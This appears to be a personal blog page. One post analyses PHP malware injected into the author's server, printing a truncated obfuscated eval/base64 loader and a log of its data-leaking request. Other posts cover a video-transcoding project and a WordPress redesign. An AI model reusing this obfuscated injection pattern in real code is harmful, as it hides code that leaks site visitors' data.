Battle against injected PHP

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.

Software > MediaDrop Automatic Transcoding Script

I’ve been working on a somewhat private personal website intended for sharing of family videos. I’ve converted roughly 200hrs of old family video tapes in to media files and am well on my way to having converted the files in to individual scenes/clips. The content is being shared, with family, using an instant of the web application “MediaDrop”. I love this web application. It’s epic. I was just looking for a podcast feed generator and I found a lot more in MediaDrop.

I then got sort of obsessed with this cool web app and eventually having family members upload their own videos. The problem was I need the format of the content to be normalized such that it’ll cooperate over the podcast feed. After all, these are meant to be easily viewed on Apple TVs. I found a script for this job, as MediaDrop doesn’t transcode. Only the script kind of sucked for my purposes. So I forked it!

Check out my first github project here: https://github.com/docdawning/mediadrop-handbrake-bot

It automatically transcodes uploaded videos to MP4 files, compatible with Apple TV3 devices.

Dawning.ca Spruced Up

Previous Dawning.ca Layout
Previous Dawning.ca Layout

I’ve just spent a few hours re-designing the layout of Dawning.ca. The old one served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup… As you can see to the right, the new style is fairly different compared to the image. Although I kept the workflow as I think it was already pretty good.

Objectives

Basically, I was trying to get the site to be:

  • Simple to use
  • Uncluttered
  • Attractive
  • Professional & Casual
  • Technically Interesting
  • Simple to use
  • Did I mention, simple to use?

I feel I accomplished these goals. Though I felt I had to sacrifice some technically interesting features in order to reduce the clutter. I had made some cool logos awhile ago that looked good on the more cartoony past version of the site, but they looked horrible here. I ultimately decided to just get rid of the top banner all together, I don’t think people need to keep being reminded of what site they’re on. Anyway, comment below eh!?

Technical Blah

I’m using a few css tricks I’ve learned in the last while to round corners, shade and pretty things up. Mainly, for rounded corners I use tricks such as those found here.

In terms of the shading, if you carefully look at my setup, the black gradient on the red background is made from a 1 x 200 px png image file overlayed on a red background. CSS for that trick is that like this:

background-image: url('/media/bkgd.png');
background-repeat: repeat-x;

Most shaded regions are made using 10 x 10 px images repeated that are very transparent png images. I use css nearly identical to that above for this too, only difference is the repeat statement has no -x to it.

I built up the new theme using the very famous and helpful Atahualpa theme. I’ve used this theme for various WordPress websites of mine including those for:

Also, my buddy Devin who I recently helped get his first Apache/MySQL/PHP/WordPress server install going is using the Atahualpa Theme for his website, it truly is a great WordPress theme for both advanced and beginners alike.

Your Turn

What do you all think of my redesign? Any suggestions? What WordPress theme do you use?